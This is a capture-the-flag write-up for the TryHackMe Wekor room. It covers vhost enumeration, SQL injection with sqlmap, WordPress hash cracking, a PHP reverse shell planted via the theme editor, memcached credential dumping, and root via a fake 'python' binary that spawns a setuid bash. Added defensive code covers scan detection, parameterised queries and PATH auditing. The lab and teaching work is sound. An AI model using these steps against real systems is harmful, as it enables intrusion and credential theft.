Wekor — TryHackMe

Wekor THM

CTF challenge involving SQLi, WordPress, vhost enumeration and recognizing internal services ;) This room can be found here:

https://tryhackme.com/room/wekorra

Before starting, add an entry to the /etc/hosts file on your attacking box mapping the target's IP address to the name "wekor.thm":

10.10.110.202 wekor.thm

Enumeration

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- wekor.thm

┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -sS -Pn -T4 -p- wekor.thm
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,80 10.10.98.254

┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -O -A -Pn -T4 -p22,80 wekor.thm
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 95:c3:ce:af:07:fa:e2:8e:29:04:e4:cd:14:6a:21:b5 (RSA)
| 256 4d:99:b5:68:af:bb:4e:66:ce:72:70:e6:e3:f8:96:a4 (ECDSA)
|_ 256 0d:e5:7d:e8:1a:12:c0:dd:b7:66:5e:98:34:55:59:f6 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 9 disallowed entries
| /workshop/ /root/ /lol/ /agent/ /feed /crawler /boot
|_/comingreallysoon /interesting
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

Browsing through all the entries in robots.txt, we found one site at:

http://wekor.thm/it-next/it_blog.php

Let's also brute-force directories under http://wekor.thm/it-next:

FFUF

┌──(kali㉿kali)-[/opt/tools]
└─$ ffuf -u http://wekor.thm/it-next/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c
v1.2.1
________________________________________________
:: Method : GET
:: URL : http://wekor.thm/it-next/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.php [Status: 200, Size: 66925, Words: 19904, Lines: 1246]
images [Status: 301, Size: 315, Words: 20, Lines: 10]
css [Status: 301, Size: 312, Words: 20, Lines: 10]
js [Status: 301, Size: 311, Words: 20, Lines: 10]
config.php [Status: 200, Size: 0, Words: 1, Lines: 1]
fonts [Status: 301, Size: 314, Words: 20, Lines: 10]
revolution [Status: 301, Size: 319, Words: 20, Lines: 10]
[Status: 200, Size: 66925, Words: 19904, Lines: 1246]
.php [Status: 403, Size: 274, Words: 20, Lines: 10]
.html [Status: 403, Size: 274, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 461 req/sec :: Duration: [0:20:36] :: Errors: 0 ::

Nothing interesting here. The room description mentioned vhost enumeration, so in the next section let's check whether there are any other vhosts.

Virtual Host Enumeration

We can use gobuster to enumerate virtual hosts:

┌──(kali㉿kali)-[/tmp]
└─$ gobuster vhost -u wekor.thm -w /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://wekor.thm
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/03/08 16:11:56 Starting gobuster
===============================================================
Found: site.wekor.thm (Status: 200) [Size: 143]
===============================================================
2021/03/08 16:12:35 Finished
===============================================================

And we found one.
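From the defending side, both scans above leave a distinctive footprint in the Apache access log. The following is an added Python example (mine, not from the room or from the tools) that runs three simple detections over constructed log lines: the default User-Agent values of the two tools (gobuster prints its own in the banner above; ffuf's is "Fuzz Faster U Fool" followed by the version), a high proportion of 404 responses from one client, and many different Host headers from one client, which is what a vhost brute force looks like once Apache is told to log %{Host}i. The log format, the sample lines and the thresholds are assumptions for the example.

```python
import re
from collections import defaultdict

# Assumed Apache LogFormat for the sample lines, with the requested Host header first:
#   "%{Host}i %h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\""
LINE_RE = re.compile(
    r'^(?P<host>\S+) (?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Default User-Agent markers of the two tools used in this write-up (ffuf, gobuster).
SCANNER_UA_MARKERS = ("Fuzz Faster U Fool", "gobuster")

# Constructed sample log, not captured from the target. 10.10.14.5 behaves like ffuf
# (directory brute force) followed by gobuster (vhost brute force); 192.168.1.20 is a browser.
SAMPLE_LOG = """\
wekor.thm 10.10.14.5 - - [08/Mar/2021:16:10:01 +0000] "GET /it-next/index.php HTTP/1.1" 200 66925 "-" "Fuzz Faster U Fool v1.2.1"
wekor.thm 10.10.14.5 - - [08/Mar/2021:16:10:01 +0000] "GET /it-next/admin.php HTTP/1.1" 404 274 "-" "Fuzz Faster U Fool v1.2.1"
wekor.thm 10.10.14.5 - - [08/Mar/2021:16:10:01 +0000] "GET /it-next/backup.php HTTP/1.1" 404 274 "-" "Fuzz Faster U Fool v1.2.1"
wekor.thm 10.10.14.5 - - [08/Mar/2021:16:10:02 +0000] "GET /it-next/test.html HTTP/1.1" 404 274 "-" "Fuzz Faster U Fool v1.2.1"
wekor.thm 10.10.14.5 - - [08/Mar/2021:16:10:02 +0000] "GET /it-next/old.txt HTTP/1.1" 404 274 "-" "Fuzz Faster U Fool v1.2.1"
wekor.thm 10.10.14.5 - - [08/Mar/2021:16:10:02 +0000] "GET /it-next/config.php HTTP/1.1" 200 0 "-" "Fuzz Faster U Fool v1.2.1"
wekor.thm 10.10.14.5 - - [08/Mar/2021:16:10:03 +0000] "GET /it-next/login.php HTTP/1.1" 404 274 "-" "Fuzz Faster U Fool v1.2.1"
wekor.thm 10.10.14.5 - - [08/Mar/2021:16:10:03 +0000] "GET /it-next/dev.php HTTP/1.1" 404 274 "-" "Fuzz Faster U Fool v1.2.1"
admin.wekor.thm 10.10.14.5 - - [08/Mar/2021:16:11:56 +0000] "GET / HTTP/1.1" 200 66925 "-" "gobuster/3.0.1"
mail.wekor.thm 10.10.14.5 - - [08/Mar/2021:16:11:56 +0000] "GET / HTTP/1.1" 200 66925 "-" "gobuster/3.0.1"
site.wekor.thm 10.10.14.5 - - [08/Mar/2021:16:11:57 +0000] "GET / HTTP/1.1" 200 143 "-" "gobuster/3.0.1"
dev.wekor.thm 10.10.14.5 - - [08/Mar/2021:16:11:57 +0000] "GET / HTTP/1.1" 200 66925 "-" "gobuster/3.0.1"
wekor.thm 192.168.1.20 - - [08/Mar/2021:16:12:10 +0000] "GET /it-next/it_blog.php HTTP/1.1" 200 12345 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"
wekor.thm 192.168.1.20 - - [08/Mar/2021:16:12:11 +0000] "GET /it-next/css/style.css HTTP/1.1" 200 2048 "http://wekor.thm/it-next/it_blog.php" "Mozilla/5.0 (X11; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"
"""


def parse_line(line):
    """Return a dict of the fields in one log line, or None if it does not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def analyze(log_text, min_requests=10, notfound_ratio=0.4, max_hosts=3):
    """Group lines by client IP and return {client: [finding, ...]} for clients that trip a rule."""
    per_client = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            per_client[rec["client"]].append(rec)

    report = {}
    for client, recs in per_client.items():
        findings = []
        # Rule 1: a known scanner User-Agent, regardless of volume.
        uas = {r["ua"] for r in recs}
        for marker in SCANNER_UA_MARKERS:
            if any(marker in ua for ua in uas):
                findings.append(f"scanner user-agent seen: {marker}")
        total = len(recs)
        if total >= min_requests:
            # Rule 2: mostly 404s, the signature of guessing paths from a wordlist.
            not_found = sum(1 for r in recs if r["status"] == 404)
            if not_found / total >= notfound_ratio:
                findings.append(f"high 404 ratio: {not_found}/{total} (directory brute force?)")
            # Rule 3: one client asking for many different Host names.
            hosts = {r["host"] for r in recs}
            if len(hosts) > max_hosts:
                findings.append(f"{len(hosts)} distinct Host headers from one client (vhost brute force?)")
        if findings:
            report[client] = findings
    return report


if __name__ == "__main__":
    for client, findings in analyze(SAMPLE_LOG).items():
        print(client)
        for f in findings:
            print("  -", f)
```

The vhost rule only works if the requested Host header is logged; the stock combined format records %v, the name of the vhost that answered, which for unknown names is always the default vhost. Tuning aside, the easiest real-world fix for the vhost finding is a catch-all default vhost that returns nothing useful, so that guessing names yields the same page every time.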

Update the /etc/hosts file with the new host found in the above scan:

10.10.110.202 site.wekor.thm
10.10.110.202 wekor.thm

Let's access this new site via the browser:

site.wekor.thm

We got a potential username. Now brute-force this new site using ffuf to find directories we can access:

┌──(kali㉿kali)-[/tmp]
└─$ ffuf -u http://site.wekor.thm/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c
v1.2.1
________________________________________________
:: Method : GET
:: URL : http://site.wekor.thm/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.html [Status: 200, Size: 143, Words: 27, Lines: 6]
wordpress [Status: 301, Size: 320, Words: 20, Lines: 10]
[Status: 200, Size: 143, Words: 27, Lines: 6]
.html [Status: 403, Size: 279, Words: 20, Lines: 10]
.php [Status: 403, Size: 279, Words: 20, Lines: 10]
server-status [Status: 403, Size: 279, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 464 req/sec :: Duration: [0:38:07] :: Errors: 0 ::

Ah finally we got a WordPress site:

wordpress

Enumerate this site with WPScan:

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://site.wekor.thm/wordpress/ --enumerate vp,u
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 3.8.15
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://site.wekor.thm/wordpress/ [10.10.110.202]
[+] Started: Mon Mar 8 16:25:32 2021
Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://site.wekor.thm/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://site.wekor.thm/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://site.wekor.thm/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://site.wekor.thm/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.6 identified (Outdated, released on 2020-12-08).
| Found By: Rss Generator (Passive Detection)
| - http://site.wekor.thm/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.6</generator>
| - http://site.wekor.thm/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.6</generator>
[+] WordPress theme in use: twentytwentyone
| Location: http://site.wekor.thm/wordpress/wp-content/themes/twentytwentyone/
| Last Updated: 2020-12-22T00:00:00.000Z
| Readme: http://site.wekor.thm/wordpress/wp-content/themes/twentytwentyone/readme.txt
| [!] The version is out of date, the latest version is 1.1
| Style URL: http://site.wekor.thm/wordpress/wp-content/themes/twentytwentyone/style.css?ver=1.0
| Style Name: Twenty Twenty-One
| Style URI: https://wordpress.org/themes/twentytwentyone/
| Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://site.wekor.thm/wordpress/wp-content/themes/twentytwentyone/style.css?ver=1.0, Match: 'Version: 1.0'
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:01:50 <===================================================================> (10 / 10) 100.00% Time: 00:01:50
[i] User(s) Identified:

[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://site.wekor.thm/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Mar 8 16:30:20 2021
[+] Requests Done: 54
[+] Cached Requests: 6
[+] Data Sent: 14.766 KB
[+] Data Received: 394.663 KB
[+] Memory used: 239.621 MB
[+] Elapsed time: 00:04:48

Tried a few things, like brute-forcing the password for user admin with WPScan:

wpscan --url http://site.wekor.thm/wordpress/ -U user.txt -P /usr/share/wordlists/rockyou.txt -vv

But couldn't find the password. Checked the /wp-content/ and /wp-includes/ directories, but they are not accessible. So this looks to be a dead end.

Back to the other site:

http://wekor.thm/it-next/it_cart.php

The room description mentioned SQLi, so on checking the site, one vulnerable injection point was found at:

http://wekor.thm/it-next/it_cart.php

sqli

We have a SQL injection vulnerability here, as we get an error when we put a single quote in the Apply Coupon input box.
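Why a single quote produces an error, and what the fix looks like: an added Python/sqlite3 example (mine, not the shop's PHP code, which the page does not show) with a hypothetical coupon table. The vulnerable lookup concatenates the coupon code into the SQL string, so a lone quote breaks the statement's syntax and a quote-and-OR input rewrites the WHERE clause; the parameterised version binds the code as data, so both inputs simply match no coupon.

```python
import sqlite3


def build_db():
    """Constructed in-memory coupon table standing in for the shop's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE coupons (code TEXT PRIMARY KEY, discount INTEGER NOT NULL)")
    conn.executemany("INSERT INTO coupons VALUES (?, ?)", [("SAVE10", 10), ("VIP50", 50)])
    conn.commit()
    return conn


def coupon_discount_vulnerable(conn, code):
    """Hypothetical equivalent of the vulnerable lookup: the coupon code is pasted into the SQL text."""
    sql = "SELECT discount FROM coupons WHERE code = '" + code + "'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def coupon_discount_safe(conn, code):
    """Same lookup with a bound parameter: whatever the user typed is only ever compared as a value."""
    row = conn.execute("SELECT discount FROM coupons WHERE code = ?", (code,)).fetchone()
    return row[0] if row else None


def try_lookup(fn, conn, code):
    """Run a lookup and report ('ok', result) or ('error', message) so the two behaviours can be compared."""
    try:
        return ("ok", fn(conn, code))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    conn = build_db()
    # A valid code, the lone quote that produced the error on the coupon form, and a tautology.
    for code in ("SAVE10", "'", "' OR '1'='1"):
        print(repr(code))
        print("  vulnerable:", try_lookup(coupon_discount_vulnerable, conn, code))
        print("  safe:      ", try_lookup(coupon_discount_safe, conn, code))
```

The error message the vulnerable path returns is exactly the kind of database error that gave the injection point away in this room; the parameterised path never produces one for user input, which also removes the error-based signal that sqlmap relies on.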

Let's exploit this using SQLMap. Capture the POST request for this URL in Burp Suite and save that request in a text file named request.txt.

burp request

Run SQLMap:

sqlmap -r request.txt

This confirms that SQL injection is possible:

sqlmap sqli payloads

Check for available databases:

sqlmap -r request.txt --dbs

db names

Check the tables in the WordPress database:

sqlmap -r request.txt -D wordpress --tables

WordPress tables

Dump the table "wp_users":

sqlmap -r request.txt --dump -D wordpress -T wp_users

WordPress wp_users table

So we have a hash for user "admin" for the site: http://site.wekor.thm/wordpress

From here we can see the type of hash is "phpass":

phpass hash type

Put all the hashes in a text file and crack them using JtR:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=phpass hash.txt

john the ripper

Got some hashes cracked, and trying the cracked password for user "wp_yura" we were able to log in to http://site.wekor.thm/wordpress/wp-login.php.
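To make "phpass" concrete, here is an added Python reimplementation of the phpass portable hash that WordPress stored in wp_users.user_pass (my own code following the published phpass algorithm, not the page's or WordPress's code; the password and salt used below are made up). The fourth character of the hash encodes the iteration count, and the "B" that WordPress writes means 2^13 = 8192 rounds of MD5. That is cheap per guess compared with bcrypt or Argon2, which is why a wordlist run with john gets through weak passwords in these hashes quickly.

```python
import hashlib
import hmac
import os

# phpass's own alphabet; the index of a character is also the number it encodes.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data, count):
    """phpass's base64 variant (not RFC 4648): 3 bytes -> 4 chars, least significant bits first."""
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def iteration_count(hash_or_setting):
    """Decode the MD5 round count from the 4th character ('B' -> 2**13 = 8192)."""
    if hash_or_setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(hash_or_setting[3])
    if count_log2 < 7 or count_log2 > 30:
        raise ValueError("invalid iteration count")
    return 1 << count_log2


def _crypt_private(password, setting):
    """Core of phpass: md5(salt+pw), then `count` rounds of md5(prev+pw), encoded after the 12-char prefix."""
    count = iteration_count(setting)
    salt = setting[4:12].encode()
    if len(salt) != 8:
        raise ValueError("invalid salt")
    digest = hashlib.md5(salt + password).digest()
    for _ in range(count):
        digest = hashlib.md5(digest + password).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_hash(password, count_log2=13, salt=None):
    """Produce a hash as WordPress did: '$P$' + count char + 8-char salt + 22-char digest (34 chars)."""
    if salt is None:
        salt = _encode64(os.urandom(6), 6)  # 6 random bytes -> 8 salt characters
    setting = "$P$" + ITOA64[count_log2] + salt
    return _crypt_private(password.encode(), setting)


def phpass_verify(password, stored):
    """Recompute with the stored prefix (count + salt) and compare in constant time."""
    return hmac.compare_digest(_crypt_private(password.encode(), stored), stored)


if __name__ == "__main__":
    h = phpass_hash("Password1", salt="abcdefgh")  # made-up password and salt
    print(h, "rounds:", iteration_count(h))
    print("verify correct:", phpass_verify("Password1", h))
    print("verify wrong:  ", phpass_verify("password1", h))
```

Reading the count character is the quickest way to judge a dump of hashes: anything at "$P$B" is 8192 fast MD5 operations per candidate, so password policy and rate-limited logins, not the hash, are doing the real work of protecting those accounts.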

Reverse Shell

Now it is possible to get a reverse shell from here by injecting a PHP reverse shell via Appearance -> Theme Editor -> 404 Template (404.php):

php reverse shell

Remember to put in the IP address and port number of the machine where we want the reverse shell to connect back, and start a netcat listener on that machine. Now access 404.php using the following link:

http://site.wekor.thm/wordpress/wp-content/themes/twentytwentyone/404.php

And we got a reverse shell:

nc reverse shell

Stabilize the shell by running the following commands:

/usr/bin/script -qc /bin/bash /dev/null
control+z to background
stty raw -echo
fg
export TERM=xterm

Running the Linux Smart Enumeration script on the target revealed a service listening internally on port 11211:

LSE internal port

Searching for port 11211 reveals that it is a service called memcached. Read more about it at https://memcached.org/:

Free & open source, high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load.

Memcached is an in-memory key-value store for small chunks of arbitrary data (strings, objects) from results of database calls, API calls, or page rendering.

Also found a resource which explains how this can be exploited. Connected via telnet from the target itself to this service and was able to dump credentials for a user named Orka:

www-data@osboxes:/var/www$ telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
stats items
STAT items:1:number 5
STAT items:1:age 16154
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 0
STAT items:1:lrutail_reflocked 0
END
stats cachedump 1 0
ITEM username [4 b; 1615303696 s]
ITEM password [15 b; 1615303696 s]
ITEM id [4 b; 1615303696 s]
ITEM email [14 b; 1615303696 s]
ITEM salary [8 b; 1615303696 s]
END
get username
VALUE username 0 4
Orka
END
get password
VALUE password 0 15
[REDACTED]
END
quit
Connection closed by foreign host.
www-data@osboxes:/var/www$
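The session above drives memcached's text protocol by hand. As an added example (my own Python, not the page's code or anything from the memcached project), here is a parser for the three reply shapes used there, run on constructed transcript fragments: the "stats items" reply yields the slab ids, "stats cachedump" yields keys with their sizes, and "get" yields values, which have to be read by the declared byte count because a data block may itself contain CRLF. A last helper flags key names that look like credentials, which is what a defender wants to find first: memcached has no authentication unless SASL is configured, so anything reachable on 11211 is readable by every local process.

```python
import re

# Constructed transcript fragments shaped like the telnet session above; the
# password value is a placeholder, not the room's real secret.
STATS_ITEMS = "STAT items:1:number 5\r\nSTAT items:1:age 16154\r\nSTAT items:1:evicted 0\r\nEND\r\n"
CACHEDUMP = (
    "ITEM username [4 b; 1615303696 s]\r\n"
    "ITEM password [15 b; 1615303696 s]\r\n"
    "ITEM id [4 b; 1615303696 s]\r\n"
    "ITEM email [14 b; 1615303696 s]\r\n"
    "ITEM salary [8 b; 1615303696 s]\r\n"
    "END\r\n"
)
# Raw bytes as the server would answer "get username password note"; the 'note'
# value deliberately contains CRLF to show why parsing must trust the byte count.
GET_RESPONSE = (
    b"VALUE username 0 4\r\nOrka\r\n"
    b"VALUE password 0 15\r\nhunter2-example\r\n"
    b"VALUE note 0 12\r\nline1\r\nline2\r\n"
    b"END\r\n"
)

SENSITIVE_KEY_RE = re.compile(r"(pass(word|wd)?|pwd|secret|token|api_?key|session|cookie)", re.I)


def parse_stats_items(text):
    """Map slab class id -> number of items from a 'stats items' reply."""
    slabs = {}
    for line in text.splitlines():
        m = re.match(r"STAT items:(\d+):number (\d+)$", line)
        if m:
            slabs[int(m.group(1))] = int(m.group(2))
    return slabs


def parse_cachedump(text):
    """Parse 'stats cachedump <slab> <limit>' output into (key, size_bytes, expiry_epoch) tuples."""
    items = []
    for line in text.splitlines():
        m = re.match(r"ITEM (\S+) \[(\d+) b; (\d+) s\]$", line)
        if m:
            items.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return items


def parse_get_response(raw):
    """Parse a 'get' reply by declared byte counts, returning key -> (flags, data bytes)."""
    values = {}
    pos = 0
    while True:
        eol = raw.index(b"\r\n", pos)
        line = raw[pos:eol]
        pos = eol + 2
        if line == b"END":
            return values
        parts = line.split()
        if len(parts) < 4 or parts[0] != b"VALUE":
            raise ValueError("unexpected line: %r" % line)
        key, flags, nbytes = parts[1].decode(), int(parts[2]), int(parts[3])
        data = raw[pos:pos + nbytes]
        # The block is exactly nbytes long and is followed by its own CRLF.
        if len(data) != nbytes or raw[pos + nbytes:pos + nbytes + 2] != b"\r\n":
            raise ValueError("truncated data block for key %s" % key)
        pos += nbytes + 2
        values[key] = (flags, data)


def sensitive_keys(keys):
    """Key names that suggest credentials: material that should never sit in an unauthenticated cache."""
    return [k for k in keys if SENSITIVE_KEY_RE.search(k)]


if __name__ == "__main__":
    print("slabs:", parse_stats_items(STATS_ITEMS))
    items = parse_cachedump(CACHEDUMP)
    print("keys:", [(k, n) for k, n, _ in items])
    print("credential-looking keys:", sensitive_keys([k for k, _, _ in items]))
    for key, (flags, data) in parse_get_response(GET_RESPONSE).items():
        print(key, flags, data)
```

Run the key classifier against a cachedump of your own instances: a plaintext password in the cache, as in this room, is an application design problem (the app should cache a session or a lookup result, never the credential), and the service itself should be bound to a Unix socket or protected with SASL rather than left open on localhost for every user.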

Let's try to switch user to "Orka" using the credentials found:

user.txt

We found our user flag in the home directory of user "Orka".

Privilege Escalation

Now it's time for privilege escalation. Before running any script, let's first check whether Orka can run anything using sudo -l:

sudo -l

Let's try to execute this binary with sudo and check how it behaves:

bitcoin binary

Hmm, we need a password. Let's see what this binary contains using strings:

strings /home/Orka/Desktop/bitcoin

strings bitcoin

Two things we noticed:

  • The password may be "password"
  • The python executable is called without its full path

So it might be possible to plant our own python binary, since it is called without a full path from inside the bitcoin executable.

Investigating the PATH variable, we find that we are able to write to the /usr/sbin directory.
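This is the check a practitioner wants to be able to run on either side of the engagement: an added Python audit (my own, not the page's) that, for each command a privileged binary invokes without a full path, reports the first PATH directory that is writable and searched before the real binary. It also reads secure_path from a sudoers file, because when that option is set (as it is in Ubuntu's default sudoers) it, not the caller's PATH, is what sudo uses. The sudoers text and the fake filesystem in the usage are constructed; the checks are passed in as callables so the audit can run against a recorded inventory as well as the live system.

```python
import os
import re

# Constructed sudoers excerpt for the example (the room only shows sudo -l output as an image).
SAMPLE_SUDOERS = """\
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Orka ALL=(root) /home/Orka/Desktop/bitcoin
"""


def _default_writable(directory):
    return os.path.isdir(directory) and os.access(directory, os.W_OK)


def _default_executable(path):
    return os.path.isfile(path) and os.access(path, os.X_OK)


def hijackable_commands(commands, path_value, is_writable=_default_writable,
                        is_executable=_default_executable):
    """For each bare command name, return the first PATH directory that is writable and is
    searched before the real binary, or None when the genuine binary is found first."""
    dirs = [d for d in path_value.split(":") if d]
    result = {}
    for cmd in commands:
        result[cmd] = None
        for d in dirs:
            if is_writable(d):
                result[cmd] = d       # a file dropped here would shadow the real command
                break
            if is_executable(os.path.join(d, cmd)):
                break                 # real binary reached before any writable directory


    return result


def secure_path_from_sudoers(sudoers_text):
    """Return the value of 'Defaults secure_path=...' or None when the option is absent."""
    for line in sudoers_text.splitlines():
        m = re.match(r'\s*Defaults\s+secure_path\s*=\s*"?([^"\s]+)"?', line)
        if m:
            return m.group(1)
    return None


def audit(commands, sudoers_text, fallback_path, **checks):
    """Audit the PATH sudo will actually use: secure_path when set, otherwise the caller's PATH."""
    effective = secure_path_from_sudoers(sudoers_text) or fallback_path
    return effective, hijackable_commands(commands, effective, **checks)


if __name__ == "__main__":
    # Live check on this machine: which bare commands could be shadowed from the current PATH?
    print(hijackable_commands(["python", "cp", "chmod"], os.environ.get("PATH", "")))
    # Same check with the constructed sudoers and a pretend filesystem where /usr/sbin is writable.
    writable = {"/usr/sbin"}
    execs = {"/usr/bin/python", "/bin/cp", "/usr/local/bin/ls"}
    print(audit(["python", "ls"], SAMPLE_SUDOERS, "/tmp:/bin",
                is_writable=lambda d: d in writable,
                is_executable=lambda p: p in execs))
```

The two fixes the audit points at are independent: the program should call interpreters and helpers by absolute path (or drop privileges before doing so), and no directory on secure_path should be writable by unprivileged users, which is the actual misconfiguration in this room.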

Let’s create a fake binary called python with the following content:

#include <stdio.h>
#include <stdlib.h>

/* Fake "python": placed in a writable PATH directory so that it runs instead of
   the real interpreter when the bitcoin binary (run as root via sudo) calls python
   without a full path. */
int main(void) {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
    return 0;
}

Compile it using:

gcc -o python python.c

and copy it to /usr/sbin and give it execute permission:

fake python binary

Run the bitcoin binary:

sudo /home/Orka/Desktop/bitcoin
root.txt

We are root and we found our root flag in /root.

This was a great room, and memcached was a new learning for me.

Thanks for reading. If you like the write-up please clap.

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900